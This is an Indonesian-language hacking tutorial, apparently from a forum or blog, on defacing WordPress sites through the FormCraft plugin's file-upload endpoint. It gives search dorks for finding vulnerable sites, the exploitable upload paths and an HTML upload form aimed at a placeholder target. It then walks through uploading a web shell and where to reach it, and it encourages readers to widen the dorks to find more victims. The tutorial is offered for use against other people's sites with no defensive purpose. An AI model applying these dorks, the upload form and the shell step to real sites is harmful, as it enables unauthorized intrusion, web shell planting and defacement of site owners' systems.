xixihi, Nuenomaru lagi
Maaf kalo sobat bosen, yang menting Nue Ganteng wkwkw
Oke deh langsung aja:
Dork :
- inurl:"wp-content//plugins/formcraft/"
- inurl:"wp-content//plugins/formcraft/" site:.de
(sisanya kembangin lagi ya Om dorknya, biar dapet banyak web Vuln and Verawan :v wkwkw )
Exploit :
1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/
Script CSRF :
<form method="POST" action="http://www.target.co.li/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
*Save AS: .html
*ganti target.co.li ~> menjadi url link target sobat
Cari target menggunakan dork di atas
Lalu masukkan exploit yang di atas
Jika Vuln akan nampak seperti ini
Sekarang buka filenya dengan browser yang mastah gunakan
Lalu upload deh shell kesayangan Mastah
Jika file upload nya Sukses maka nampak kaya gitu
Shell Access :
target.co.li/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php
Jika Berhasil Akan Muncul Shell Kesayangan Sobat
ya kalo kagak berhasil, mungkin faktor face , anda kurang GantenG
Sekian tutorial ini, Semoga bermanfaat
maaf bila ada kesalahan
Happy CMS Wordpress Deface Om
Source and Thanks to: FORUM INCEF
./Nuenomaru
EmoticonEmoticon